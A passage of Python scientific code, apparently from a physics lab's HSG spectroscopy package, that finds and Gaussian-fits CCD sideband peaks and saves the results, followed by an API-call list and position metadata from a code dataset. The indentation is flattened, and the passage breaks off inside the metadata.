kwargs:
window_size: how big of a window (in pixels) to use for checking for
sidebands. Specified in half-width
default: 15
Internal:
self.sb_list = List of all of the orders the method found
self.sb_index = index of all of the peaks of the sidebands
self.sb_guess = three-part list including the frequency, amplitude and
error guesses for each sideband
"""
# TODO: this isn't commented appropriately.
# Will it be made more readable first?
if "cutoff" in self.parameters:
cutoff = self.parameters["cutoff"]
else:
self.parameters['cutoff for guess_sidebands'] = cutoff
if verbose:
print("=" * 15)
print()
print("Guessing CCD Sideband parameters")
print(os.path.basename(self.fname))
print("\tCutoff = {}".format(cutoff))
print()
print("=" * 15)
x_axis = np.array(self.proc_data[:, 0])
y_axis = np.array(self.proc_data[:, 1])
error = np.array(self.proc_data[:, 2])
min_sb = int(self.calc_approx_sb_order(x_axis[0])) + 1
try:
max_sb = int(self.calc_approx_sb_order(x_axis[-1]))
except ValueError:
print(x_axis)
nir_freq = self.parameters["nir_freq"]
thz_freq = self.parameters["thz_freq"]
if verbose:
print("min_sb: {} | max_sb: {}".format(min_sb, max_sb))
# Find max strength sideband and it's order
global_max = np.argmax(y_axis)
order_init = int(round(self.calc_approx_sb_order(x_axis[global_max])))
# if verbose:
# print "The global max is at index", global_max
if global_max < 15:
check_y = y_axis[:global_max + 15]
check_y = np.concatenate((np.zeros(15 - global_max), check_y))
elif global_max > 1585:
check_y = y_axis[global_max - 15:]
check_y = np.concatenate((check_y, np.zeros(global_max - 1585)))
else:
check_y = y_axis[global_max - 15:global_max + 15]
check_max_index = np.argmax(check_y)
check_max_area = np.sum(
check_y[check_max_index - 2:check_max_index + 3])
check_ave = np.mean(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])
check_stdev = np.std(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])
check_ratio = (check_max_area - 3 * check_ave) / check_stdev
if verbose:
print(("{:^16}" * 5).format(
"global_max idx", "check_max_area", "check_ave", "check_stdev",
"check_ratio"))
print(("{:^16.5g}" * 5).format(
global_max, check_max_area, check_ave,
check_stdev, check_ratio))
if check_ratio > cutoff:
self.sb_list = [order_init]
self.sb_index = [global_max]
sb_freq_guess = [x_axis[global_max]]
sb_amp_guess = [y_axis[global_max]]
sb_error_est = [
np.sqrt(sum([i ** 2 for i in error[
global_max - 2:global_max + 3]]))
/ (check_max_area - 5 * check_ave)]
else:
print("There are no sidebands in", self.fname)
raise RuntimeError
if verbose:
print("\t Looking for sidebands with f < {:.6f}".format(
sb_freq_guess[0]))
last_sb = sb_freq_guess[0]
index_guess = global_max
# keep track of how many consecutive sidebands we've skipped. Sometimes
# one's noisy or something, so we'd keep looking after skipping one
consecutive_null_sb = 0
consecutive_null_odd = 0
no_more_odds = False
break_condition = False
for order in range(order_init - 1, min_sb - 1, -1):
# Check to make sure we're not looking at an odd when
# we've decided to skip them.
if no_more_odds is True and order % 2 == 1:
last_sb = last_sb - thz_freq
if verbose:
print("I skipped", order)
continue
# Window size to look for next sideband. Needs to be order
# dependent because higher orders get wider, so we need to look at
# more. Values are arbitrary.
window_size = 0.45 + 0.0004 * order # used to be last_sb?
lo_freq_bound = last_sb - thz_freq * (
1 + window_size) # Not sure what to do about these
hi_freq_bound = last_sb - thz_freq * (1 - window_size)
if verbose:
print("\nSideband", order)
print("\t{:.4f} < f_{} < {:.4f}".format(lo_freq_bound, order,
hi_freq_bound))
# Get the indices where the energies lie within the bounds for this SB
sliced_indices = \
np.where((x_axis > lo_freq_bound)
& (x_axis < hi_freq_bound))[0]
start_index, end_index = sliced_indices.min(), sliced_indices.max()
# Get a slice of the y_data which is only in the region of interest
check_y = y_axis[sliced_indices]
check_max_index = np.argmax(
check_y) # This assumes that two floats won't be identical
# Calculate the "area" of the sideband by looking at the peak value
# within the range, and the pixel above/below it
check_max_area = np.sum(
check_y[check_max_index - 1:check_max_index + 2])
if verbose and plot:
plt.figure("CCD data")
plt.plot(
[lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[lo_freq_bound, hi_freq_bound], [check_y[check_max_index]]
* 2, 'b', label="{} Box".format(order))
plt.text(
(lo_freq_bound + hi_freq_bound) / 2,
check_y[check_max_index], order)
# get slice that doesn't have the peak in it to compare statistics
check_region = np.append(check_y[:check_max_index - 1],
check_y[check_max_index + 2:])
check_ave = check_region.mean()
check_stdev = check_region.std()
# Calculate an effective SNR, where check_ave is roughly the
# background level
check_ratio = (check_max_area - 3 * check_ave) / check_stdev
# This raises the barrier for odd sideband detection
if order % 2 == 1:
check_ratio = check_ratio / 1.5
if verbose:
print("\t" + ("{:^14}" * 4).format(
"check_max_area", "check_ave",
"check_stdev", "check_ratio"))
print("\t" + ("{:^14.5g}" * 4).format(
check_max_area, check_ave, check_stdev, check_ratio))
if check_ratio > cutoff:
found_index = check_max_index + start_index
self.sb_index.append(found_index)
last_sb = x_axis[found_index]
if verbose:
print("I just found", last_sb)
sb_freq_guess.append(x_axis[found_index])
sb_amp_guess.append(check_max_area - 3 * check_ave)
error_est = np.sqrt(
sum(
[i ** 2 for i in error[
found_index - 1:found_index + 2]]
)) / (check_max_area - 3 * check_ave)
if verbose:
print("My error estimate is:", error_est)
sb_error_est.append(error_est)
self.sb_list.append(order)
consecutive_null_sb = 0
if order % 2 == 1:
consecutive_null_odd = 0
else:
# print "I could not find sideband with order", order
last_sb = last_sb - thz_freq
consecutive_null_sb += 1
if order % 2 == 1:
consecutive_null_odd += 1
if consecutive_null_odd == 1 and no_more_odds is False:
# print "I'm done looking for odd sidebands"
no_more_odds = True
if consecutive_null_sb == 2:
# print "I can't find any more sidebands"
break
# Look for higher sidebands
if verbose:
print("\nLooking for higher energy sidebands")
last_sb = sb_freq_guess[0]
index_guess = global_max
consecutive_null_sb = 0
consecutive_null_odd = 0
no_more_odds = False
break_condition = False
for order in range(order_init + 1, max_sb + 1):
if no_more_odds is True and order % 2 == 1:
last_sb = last_sb + thz_freq
continue
window_size = 0.45 + 0.001 * order # used to be 0.28 and 0.0004
lo_freq_bound = last_sb + thz_freq * (
1 - window_size) # Not sure what to do about these
hi_freq_bound = last_sb + thz_freq * (1 + window_size)
start_index = False
end_index = False
if verbose:
print("\nSideband", order)
# print "The low frequency bound is", lo_freq_bound
# print "The high frequency bound is", hi_freq_bound
print("\t{:.4f} < f_{} < {:.4f}".format(lo_freq_bound, order,
hi_freq_bound))
for i in range(index_guess, 1600):
if start_index is False and i == 1599:
# print "I'm all out of space, captain!"
break_condition = True
break
elif start_index is False and x_axis[i] > lo_freq_bound:
# print "start_index is", i
start_index = i
elif i == 1599:
end_index = 1599
# print "hit end of data, end_index is 1599"
elif end_index is False and x_axis[i] > hi_freq_bound:
end_index = i
# print "end_index is", i
index_guess = i
break
if break_condition:
break
check_y = y_axis[start_index:end_index]
check_max_index = np.argmax(
check_y) # This assumes that two floats won't be identical
# To be able to break down check_y into eighths
octant = len(check_y) // 8
if octant < 1:
octant = 1
check_max_area = np.sum(
check_y[check_max_index - octant - 1:
check_max_index + octant + 1])
if verbose and plot:
plt.figure("CCD data")
plt.plot(
[lo_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[hi_freq_bound] * 2, [0, check_y[check_max_index]], 'b')
plt.plot(
[lo_freq_bound, hi_freq_bound],
[check_y[check_max_index]] * 2, 'b', label=order)
plt.text(
(lo_freq_bound + hi_freq_bound) / 2,
check_y[check_max_index], order)
no_peak = (2 * len(
check_y)) // 6 # The denominator is in flux, used to be 5
# if verbose: print "\tcheck_y length", len(check_y)
check_ave = np.mean(np.take(check_y, np.concatenate(
(np.arange(no_peak), np.arange(-no_peak, 0)))))
check_stdev = np.std(np.take(check_y, np.concatenate(
(np.arange(no_peak), np.arange(-no_peak, 0)))))
check_ratio = ((check_max_area - (2 * octant + 1) * check_ave)
/ check_stdev)
if verbose:
print("\tIndices: {}->{} (d={})".format(start_index, end_index,
len(check_y)))
# print "check_y is", check_y
# print "\ncheck_max_area is", check_max_area
# print "check_ave is", check_ave
# print "check_stdev is", check_stdev
# print "check_ratio is", check_ratio
print("\t" + ("{:^14}" * 4).format(
"check_max_area", "check_ave",
"check_stdev", "check_ratio"))
print("\t" + ("{:^14.6g}" * 4).format(
check_max_area, check_ave, check_stdev, check_ratio))
# This raises the barrier for odd sideband detection
if order % 2 == 1:
check_ratio = check_ratio / 2
if check_ratio > cutoff:
found_index = check_max_index + start_index
self.sb_index.append(found_index)
last_sb = x_axis[found_index]
# print "\tI found", order, "at index", found_index, "at freq", last_sb
if verbose:
print(
"\tI'm counting this SB at index {} (f={:.4f})".format(
found_index, last_sb), end=' ')
sb_freq_guess.append(x_axis[found_index])
sb_amp_guess.append(
check_max_area - (2 * octant + 1) * check_ave)
error_est = (
np.sqrt(sum([i ** 2 for i in error[
found_index - octant:found_index + octant]]))
/ (check_max_area - (2 * octant + 1) * check_ave))
# This error is a relative error.
if verbose:
print(". Err = {:.3g}".format(error_est))
# print "\tMy error estimate is:", error_est
# print "My relative error is:", error_est / sb_amp_guess
sb_error_est.append(error_est)
self.sb_list.append(order)
consecutive_null_sb = 0
if order % 2 == 1:
consecutive_null_odd = 0
else:
# print "I could not find sideband with order", order
last_sb = last_sb + thz_freq
consecutive_null_sb += 1
if order % 2 == 1:
consecutive_null_odd += 1
if verbose:
print("\t\tI did not count this sideband")
if consecutive_null_odd == 1 and no_more_odds is False:
# print "I'm done looking for odd sidebands"
no_more_odds = True
if consecutive_null_sb == 2:
# print "I can't find any more sidebands"
break
if verbose:
print("I found these sidebands:", self.sb_list)
print('-' * 15)
print()
print()
self.sb_guess = np.array(
[np.asarray(sb_freq_guess), np.asarray(sb_amp_guess),
np.asarray(sb_error_est)]).T
# self.sb_guess = [frequency guess, amplitude guess,
# relative error of amplitude] for each sideband.
def fit_sidebands(self, plot=False, verbose=False):
"""
This takes self.sb_guess and fits to each maxima to get the details of
each sideband. It's really ugly, but it works. The error of the
sideband area is approximated from the data, not the curve fit. All
else is from the curve fit. Which is definitely underestimating the
error, but we don't care too much about those errors (at this point).
self.sb_guess = [frequency guess, amplitude guess, relative error of
amplitude] for each sideband.
Temporary stuff:
sb_fits = holder of the fitting results until all spectra have been fit
window = an integer that determines the "radius" of the fit window,
proportional to thz_freq.
Attributes created:
self.sb_results = the money maker. Column order:
[sb number, Freq (eV), Freq error (eV), Gauss area (arb.),
Area error, Gauss linewidth (eV), Linewidth error (eV)]
[ 0 , 1 , 2, , 3 ,
4 , 5 , 6 ]
self.full_dict = a dictionary similar to sb_results, but now the keys
are the sideband orders. Column ordering is otherwise the same.
:param plot: Do you want to see the fits plotted with the data?
:type plot: bool
:param verbose: Do you want to see the details
AND the initial guess fits?
:type verbose: bool
:return: None
"""
# print "Trying to fit these"
sb_fits = []
if verbose:
print("=" * 15)
print()
print("Fitting CCD Sidebands")
print(os.path.basename(self.fname))
print()
print("=" * 15)
# pretty sure you want this up here so things don't break
# when no sidebands found
self.full_dict = {}
thz_freq = self.parameters["thz_freq"]
# Adjust the fit window based on the sideband spacing The 15's are based on
# empirical knowledge that for 540 GHz (2.23 meV), the best window size is 30
# and that it seems like the window size should grow slowly?
window = 15 + int(15 * thz_freq / 0.0022)
# Have to do this because guess_sidebands doesn't out put data in the
# most optimized way
for elem, peakIdx in enumerate(self.sb_index):
if peakIdx < window:
data_temp = self.proc_data[:peakIdx + window, :]
elif (1600 - peakIdx) < window:
data_temp = self.proc_data[peakIdx - window:, :]
else:
data_temp = self.proc_data[
peakIdx - window:peakIdx + window, :]
# so the width guess gets wider as order goes up
width_guess = 0.0001 + 0.000001 * self.sb_list[elem]
p0 = np.array([self.sb_guess[elem, 0],
self.sb_guess[elem, 1] * width_guess,
width_guess,
0.1])
# print "Let's fit this shit!"
if verbose:
# TODO: check that . operator can carry to next line
print(
"Fitting SB {}. Peak index: {}, {}th peak in spectra".
format(self.sb_list[elem], peakIdx, elem))
# print "\nnumber:", elem, num
# print "data_temp:", data_temp
# print "p0:", p0
print(' '*20 + "p0 = " + np.array_str(p0, precision=4))
# This is to disable plotting the guess function
# plot_guess = True
if verbose and plot:
plt.figure('CCD data')
linewidth = 3
x_vals = np.linspace(
data_temp[0, 0], data_temp[-1, 0], num=500)
if elem != 0:
try:
plt.plot(x_vals, gauss(x_vals, *p0),
# I don't really know. Mostly
plt.gca().get_lines()[-1].get_color() + '--',
# just looked around at what functions
# matplotlib has...
linewidth=linewidth)
# to prevent weird mac issues with the matplotlib things?
except Exception:
plt.plot(
x_vals, gauss(x_vals, *p0), '--',
linewidth=linewidth)
else:
plt.plot(
x_vals, gauss(x_vals, *p0), '--',
linewidth=linewidth)
try:
# 11/1/16
# had to bump maxfev up to 2k since a sideband wasn't being fit
# Fix for sb 106
# 05-23 Loren 10nm\hsg_640_Perp352seq_spectrum.txt
# TODO: find new name for guass parameter and correct code
coeff, var_list = curve_fit(
gauss, data_temp[:, 0], data_temp[:, 1],
p0=p0, maxfev=2000)
except Exception as e:
if verbose:
print("\tThe fit failed:")
print("\t\t", e)
print("\tFitting region: {}->{}".format(
peakIdx-window, peakIdx+window))
# print "I couldn't fit", elem
# print "It's sideband", num
# print "In file", self.fname
# print "because", e
# print "wanted to fit xindx", peakIdx, "+-", window
self.sb_list[elem] = None
# This will ensure the rest of the loop is not run without
# an actual fit.
continue
# The amplitude could be negative if the linewidth is negative
coeff[1] = abs(coeff[1])
# The linewidth shouldn't be negative
coeff[2] = abs(coeff[2])
if verbose:
print("\tFit successful: ", end=' ')
print("p = " + np.array_str(coeff, precision=4))
# print "coeffs:", coeff
# print "sigma for {}: {}".format(self.sb_list[elem], coeff[2])
if 10e-4 > coeff[2] > 10e-6:
try:
sb_fits.append(np.hstack((
self.sb_list[elem], coeff,
np.sqrt(np.diag(var_list)))))
except RuntimeWarning:
sb_fits.append(np.hstack((
self.sb_list[elem], coeff,
np.sqrt(np.abs(np.diag(var_list))))))
# the var_list wasn't approximating the error well enough, even
# when using sigma and absoluteSigma self.sb_guess[elem, 2] is
# the relative error as calculated by the guess_sidebands
# method coeff[1] is the area from the fit. Therefore, the
# product should be the absolute error of the integrated area
# of the sideband. The other errors are still underestimated.
#
# 1/12/18 note: So it looks like what hunter did is calculate
# an error estimate for the strength/area by the quadrature sum
# of errors of the points in the peak
# (from like 813 in guess_sidebands:
# error_est = np.sqrt(sum([i ** 2 for i in error[
# found_index - 1:found_index + 2]])) / (
# Where the error is what comes from the CCD by averaging 4
# spectra. As far as I can tell, it doesn't currently pull in
# the dark counts or anything like that, except maybe
# indirectly since it'll cause the variations in the peaks
sb_fits[-1][6] = self.sb_guess[elem, 2] * coeff[1]
if verbose:
print(
"\tRel.Err: {:.4e} | Abs.Err: {:.4e}".format(
self.sb_guess[elem, 2],
coeff[1] * self.sb_guess[elem, 2]))
print()
# print "The rel. error guess is",
# self.sb_guess[elem, 2]
# print "The abs. error guess is",
# coeff[1] * self.sb_guess[elem, 2]
# The error from self.sb_guess[elem, 2] is a relative error
if plot and verbose:
plt.figure('CCD data')
linewidth = 5
x_vals = np.linspace(
data_temp[0, 0], data_temp[-1, 0], num=500)
if elem != 0:
try:
plt.plot(x_vals, gauss(x_vals, *coeff),
plt.gca().get_lines()[-1].get_color() + '--',
# I don't really know. Mostly
# just looked around at what functions
# matplotlib has...
linewidth=linewidth)
# to prevent weird mac issues with the matplotlib things?
except Exception:
plt.plot(
x_vals, gauss(x_vals, *coeff), '--',
linewidth=linewidth)
else:
plt.plot(
x_vals, gauss(x_vals, *coeff), '--',
linewidth=linewidth)
sb_fits_temp = np.asarray(sb_fits)
reorder = [0, 1, 5, 2, 6, 3, 7, 4, 8]
# Reorder the list to put the error of the i-th parameter as the i+1th.
try:
sb_fits = sb_fits_temp[:, reorder]
# if verbose: print "The abs. error guess is", sb_fits[:, 0:5]
except Exception:
raise RuntimeError("No sidebands to fit?")
# Going to label the appropriate row with the sideband
self.sb_list = sorted(list([x for x in self.sb_list if x is not None]))
sb_names = np.vstack(self.sb_list)
# Sort by SB order
sorter = np.argsort(sb_fits[:, 0])
self.sb_results = np.array(sb_fits[sorter, :7])
if verbose:
print("\tsb_results:")
print(
"\t\t" + ("{:^5s}" + ("{:^12s}")*(self.sb_results.shape[1]-1)).
format("SB", "Cen.En.", "", "Area", "", "Width", ""))
for line in self.sb_results:
print(
'\t\t[' + ("{:^5.0f}" + "{:<12.4g}"*(line.size-1)).format(
*line) + ']')
print('-'*19)
self.full_dict = {}
for sb in self.sb_results:
self.full_dict[sb[0]] = np.asarray(sb[1:])
def infer_frequencies(
self, nir_units="wavenumber", thz_units="GHz", bad_points=-2):
"""
This guy tries to fit the results from fit_sidebands to a line to get
the relevant frequencies
:param nir_units: What units do you want this to output?
:type nir_units: 'nm', 'wavenumber', 'eV', 'THz'
:param thz_units: What units do you want this to output for the THz?
:type thz_units: 'GHz', 'wavenumber', 'meV'
:param bad_points: How many more-positive order sidebands shall this
ignore?
:type bad_points: int
:return: freqNIR, freqTHz, the frequencies in the appropriate units
"""
# force same units for in dict
freqNIR, freqTHz = calc_laser_frequencies(
self, "wavenumber", "wavenumber", bad_points)
self.parameters["calculated NIR freq (cm-1)"] = "{}".format(
freqNIR, nir_units)
self.parameters["calculated THz freq (cm-1)"] = "{}".format(
freqTHz, freqTHz)
freqNIR, freqTHz = calc_laser_frequencies(
self, nir_units, thz_units, bad_points)
return freqNIR, freqTHz
def save_processing(
self, file_name, folder_str, marker='', index='', verbose=''):
"""
This will save all of the self.proc_data and the results from the
fitting of this individual file.
Format:
spectra_fname = file_name + '_' + marker + '_' + str(index) + '.txt'
fit_fname = file_name + '_' + marker + '_' + str(index) + '_fits.txt'
Inputs:
file_name = the beginning of the file name to be saved
folder_str = the location of the folder where the file will be saved,
will create the folder, if necessary.
marker = I...I don't know what this was originally for
index = used to keep these files from overwriting themselves when in a
list
Outputs:
Two files:
self.proc_data = the continuous spectrum
self.sb_results = the individual sideband details
:param file_name: The base name for the saved file
:type file_name: str
:param folder_str: The full name for the folder hte file is saved it.
Folder can be created
:type folder_str: str
:param marker: Marker for the file, appended to file_name, often the
self.parameters['series']
:type marker: str
:param index: used to keep these files from overwriting themselves when
marker is the same
:type index: str or int
:return: None
"""
try:
os.mkdir(folder_str)
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
raise
temp = np.array(self.sb_results)
# But [:, 3] is already area?
ampli = np.array([temp[:, 3] / temp[:, 5]])
# (The old name was area)
# I think it must be amplitude
temp[:, 5:7] = temp[:, 5:7] * 1000 # For meV linewidths
if verbose:
print("sb_results", self.sb_results.shape)
print("ampli", ampli.shape)
save_results = np.hstack((temp, ampli.T))
spectra_fname = file_name + '_' + marker + '_' + str(index) + '.txt'
fit_fname = file_name + '_' + marker + '_' + str(index) + '_fits.txt'
self.save_name = spectra_fname
self.parameters['addenda'] = self.addenda
self.parameters['subtrahenda'] = self.subtrahenda
try:
parameter_str = json.dumps(
self.parameters, sort_keys=True, indent=4,
separators=(',', ': '))
except Exception:
print("Source: EMCCD_image.save_images\nJSON FAILED")
print("Here is the dictionary that broke JSON:\n", self.parameters)
return
parameter_str = parameter_str.replace('\n', '\n#')
# Make the number of lines constant so importing is easier
num_lines = parameter_str.count('#')
# for num in range(99 - num_lines): parameter_str += '\n#'
parameter_str += '\n#' * (99 - num_lines)
origin_import_spec = (
'\nNIR frequency,Signal,Standard error\neV,arb. u.,arb. u.')
spec_header = '#' + parameter_str + origin_import_spec
origin_import_fits = (
# TODO: ensure splitting lines with a + for concatenation works
'\nSideband,Center energy,error,Sideband strength,error,'
+ 'Linewidth,error,Amplitude')
origin_import_fits += '\norder,eV,,arb. u.,,meV,,arb. u.'
origin_import_fits += "\n{},,,{},,,".format(marker, marker)
fits_header = '#' + parameter_str + origin_import_fits
# print "DEBUG: in saving", folder_str, ",", spectra_fname
np.savetxt(
os.path.join(folder_str, spectra_fname), self.proc_data,
delimiter=',', header=spec_header, comments='', fmt='%0.6e')
np.savetxt(
os.path.join(folder_str, fit_fname), save_results,
delimiter=',', header=fits_header, comments='', fmt='%0.6e')
if verbose:
print("Save image.\nDirectory: {}".format(os.path.join(
folder_str, spectra_fname)))
|
[
"os.mkdir",
"numpy.sum",
"numpy.argmax",
"numpy.array_str",
"json.dumps",
"numpy.argsort",
"numpy.isclose",
"numpy.mean",
"matplotlib.pyplot.figure",
"numpy.arange",
"matplotlib.pyplot.gca",
"numpy.diag",
"os.path.join",
"numpy.set_printoptions",
"numpy.std",
"numpy.append",
"numpy.linspace",
"copy.deepcopy",
"numpy.ones_like",
"os.path.basename",
"numpy.asarray",
"numpy.flipud",
"Stele.processing.processing_hsg.helper_functions.gauss",
"numpy.hstack",
"matplotlib.pyplot.text",
"scipy.optimize.curve_fit",
"numpy.vstack",
"matplotlib.pyplot.plot",
"numpy.zeros",
"numpy.where",
"numpy.array",
"numpy.sqrt"
] |
[((277, 311), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'linewidth': '(500)'}), '(linewidth=500)\n', (296, 311), True, 'import numpy as np\n'), ((3686, 3709), 'numpy.array', 'np.array', (['self.ccd_data'], {}), '(self.ccd_data)\n', (3694, 3709), True, 'import numpy as np\n'), ((4968, 4980), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (4976, 4980), True, 'import numpy as np\n'), ((5005, 5017), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (5013, 5017), True, 'import numpy as np\n'), ((5070, 5082), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (5078, 5082), True, 'import numpy as np\n'), ((6064, 6083), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (6077, 6083), False, 'import copy\n'), ((7849, 7868), 'copy.deepcopy', 'copy.deepcopy', (['self'], {}), '(self)\n', (7862, 7868), False, 'import copy\n'), ((12199, 12229), 'numpy.array', 'np.array', (['self.proc_data[:, 0]'], {}), '(self.proc_data[:, 0])\n', (12207, 12229), True, 'import numpy as np\n'), ((12247, 12277), 'numpy.array', 'np.array', (['self.proc_data[:, 1]'], {}), '(self.proc_data[:, 1])\n', (12255, 12277), True, 'import numpy as np\n'), ((12965, 12982), 'numpy.argmax', 'np.argmax', (['y_axis'], {}), '(y_axis)\n', (12974, 12982), True, 'import numpy as np\n'), ((13554, 13572), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (13563, 13572), True, 'import numpy as np\n'), ((13598, 13654), 'numpy.sum', 'np.sum', (['check_y[check_max_index - 2:check_max_index + 3]'], {}), '(check_y[check_max_index - 2:check_max_index + 3])\n', (13604, 13654), True, 'import numpy as np\n'), ((13689, 13742), 'numpy.mean', 'np.mean', (['check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]]'], {}), '(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])\n', (13696, 13742), True, 'import numpy as np\n'), ((13765, 13817), 'numpy.std', 'np.std', (['check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]]'], {}), '(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])\n', (13771, 13817), True, 'import numpy as np\n'), ((28961, 28991), 'numpy.array', 'np.array', (['self.proc_data[:, 0]'], {}), '(self.proc_data[:, 0])\n', (28969, 28991), True, 'import numpy as np\n'), ((29009, 29039), 'numpy.array', 'np.array', (['self.proc_data[:, 1]'], {}), '(self.proc_data[:, 1])\n', (29017, 29039), True, 'import numpy as np\n'), ((29056, 29086), 'numpy.array', 'np.array', (['self.proc_data[:, 2]'], {}), '(self.proc_data[:, 2])\n', (29064, 29086), True, 'import numpy as np\n'), ((29539, 29556), 'numpy.argmax', 'np.argmax', (['y_axis'], {}), '(y_axis)\n', (29548, 29556), True, 'import numpy as np\n'), ((30128, 30146), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (30137, 30146), True, 'import numpy as np\n'), ((30172, 30228), 'numpy.sum', 'np.sum', (['check_y[check_max_index - 2:check_max_index + 3]'], {}), '(check_y[check_max_index - 2:check_max_index + 3])\n', (30178, 30228), True, 'import numpy as np\n'), ((30263, 30316), 'numpy.mean', 'np.mean', (['check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]]'], {}), '(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])\n', (30270, 30316), True, 'import numpy as np\n'), ((30339, 30391), 'numpy.std', 'np.std', (['check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]]'], {}), '(check_y[[0, 1, 2, 3, 4, -1, -2, -3, -4, -5]])\n', (30345, 30391), True, 'import numpy as np\n'), ((53038, 53057), 'numpy.asarray', 'np.asarray', (['sb_fits'], {}), '(sb_fits)\n', (53048, 53057), True, 'import numpy as np\n'), ((53563, 53586), 'numpy.vstack', 'np.vstack', (['self.sb_list'], {}), '(self.sb_list)\n', (53572, 53586), True, 'import numpy as np\n'), ((53632, 53657), 'numpy.argsort', 'np.argsort', (['sb_fits[:, 0]'], {}), '(sb_fits[:, 0])\n', (53642, 53657), True, 'import numpy as np\n'), ((53684, 53713), 'numpy.array', 'np.array', (['sb_fits[sorter, :7]'], {}), '(sb_fits[sorter, :7])\n', (53692, 53713), True, 'import numpy as np\n'), ((57102, 57127), 'numpy.array', 'np.array', (['self.sb_results'], {}), '(self.sb_results)\n', (57110, 57127), True, 'import numpy as np\n'), ((57183, 57218), 'numpy.array', 'np.array', (['[temp[:, 3] / temp[:, 5]]'], {}), '([temp[:, 3] / temp[:, 5]])\n', (57191, 57218), True, 'import numpy as np\n'), ((57495, 57521), 'numpy.hstack', 'np.hstack', (['(temp, ampli.T)'], {}), '((temp, ampli.T))\n', (57504, 57521), True, 'import numpy as np\n'), ((6367, 6445), 'numpy.isclose', 'np.isclose', (["ret.parameters['center_lambda']", "other.parameters['center_lambda']"], {}), "(ret.parameters['center_lambda'], other.parameters['center_lambda'])\n", (6377, 6445), True, 'import numpy as np\n'), ((8202, 8256), 'numpy.isclose', 'np.isclose', (['ret.proc_data[0, 0]', 'other.proc_data[0, 0]'], {}), '(ret.proc_data[0, 0], other.proc_data[0, 0])\n', (8212, 8256), True, 'import numpy as np\n'), ((9193, 9221), 'os.path.basename', 'os.path.basename', (['self.fname'], {}), '(self.fname)\n', (9209, 9221), False, 'import os\n'), ((12311, 12341), 'numpy.array', 'np.array', (['self.proc_data[:, 2]'], {}), '(self.proc_data[:, 2])\n', (12319, 12341), True, 'import numpy as np\n'), ((16672, 16690), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (16681, 16690), True, 'import numpy as np\n'), ((16929, 16985), 'numpy.sum', 'np.sum', (['check_y[check_max_index - 1:check_max_index + 2]'], {}), '(check_y[check_max_index - 1:check_max_index + 2])\n', (16935, 16985), True, 'import numpy as np\n'), ((17690, 17761), 'numpy.append', 'np.append', (['check_y[:check_max_index - 1]', 'check_y[check_max_index + 2:]'], {}), '(check_y[:check_max_index - 1], check_y[check_max_index + 2:])\n', (17699, 17761), True, 'import numpy as np\n'), ((22107, 22125), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (22116, 22125), True, 'import numpy as np\n'), ((22310, 22384), 'numpy.sum', 'np.sum', (['check_y[check_max_index - octant - 1:check_max_index + octant + 1]'], {}), '(check_y[check_max_index - octant - 1:check_max_index + octant + 1])\n', (22316, 22384), True, 'import numpy as np\n'), ((33253, 33271), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (33262, 33271), True, 'import numpy as np\n'), ((33510, 33566), 'numpy.sum', 'np.sum', (['check_y[check_max_index - 1:check_max_index + 2]'], {}), '(check_y[check_max_index - 1:check_max_index + 2])\n', (33516, 33566), True, 'import numpy as np\n'), ((34271, 34342), 'numpy.append', 'np.append', (['check_y[:check_max_index - 1]', 'check_y[check_max_index + 2:]'], {}), '(check_y[:check_max_index - 1], check_y[check_max_index + 2:])\n', (34280, 34342), True, 'import numpy as np\n'), ((38626, 38644), 'numpy.argmax', 'np.argmax', (['check_y'], {}), '(check_y)\n', (38635, 38644), True, 'import numpy as np\n'), ((38896, 38970), 'numpy.sum', 'np.sum', (['check_y[check_max_index - octant - 1:check_max_index + octant + 1]'], {}), '(check_y[check_max_index - octant - 1:check_max_index + octant + 1])\n', (38902, 38970), True, 'import numpy as np\n'), ((46294, 46388), 'numpy.array', 'np.array', (['[self.sb_guess[elem, 0], self.sb_guess[elem, 1] * width_guess, width_guess, 0.1\n ]'], {}), '([self.sb_guess[elem, 0], self.sb_guess[elem, 1] * width_guess,\n width_guess, 0.1])\n', (46302, 46388), True, 'import numpy as np\n'), ((54245, 54263), 'numpy.asarray', 'np.asarray', (['sb[1:]'], {}), '(sb[1:])\n', (54255, 54263), True, 'import numpy as np\n'), ((56936, 56956), 'os.mkdir', 'os.mkdir', (['folder_str'], {}), '(folder_str)\n', (56944, 56956), False, 'import os\n'), ((57867, 57944), 'json.dumps', 'json.dumps', (['self.parameters'], {'sort_keys': '(True)', 'indent': '(4)', 'separators': "(',', ': ')"}), "(self.parameters, sort_keys=True, indent=4, separators=(',', ': '))\n", (57877, 57944), False, 'import json\n'), ((59144, 59183), 'os.path.join', 'os.path.join', (['folder_str', 'spectra_fname'], {}), '(folder_str, spectra_fname)\n', (59156, 59183), False, 'import os\n'), ((59306, 59341), 'os.path.join', 'os.path.join', (['folder_str', 'fit_fname'], {}), '(folder_str, fit_fname)\n', (59318, 59341), False, 'import os\n'), ((3071, 3090), 'numpy.array', 'np.array', (['hsg_thing'], {}), '(hsg_thing)\n', (3079, 3090), True, 'import numpy as np\n'), ((3432, 3456), 'numpy.flipud', 'np.flipud', (['self.ccd_data'], {}), '(self.ccd_data)\n', (3441, 3456), True, 'import numpy as np\n'), ((6617, 6680), 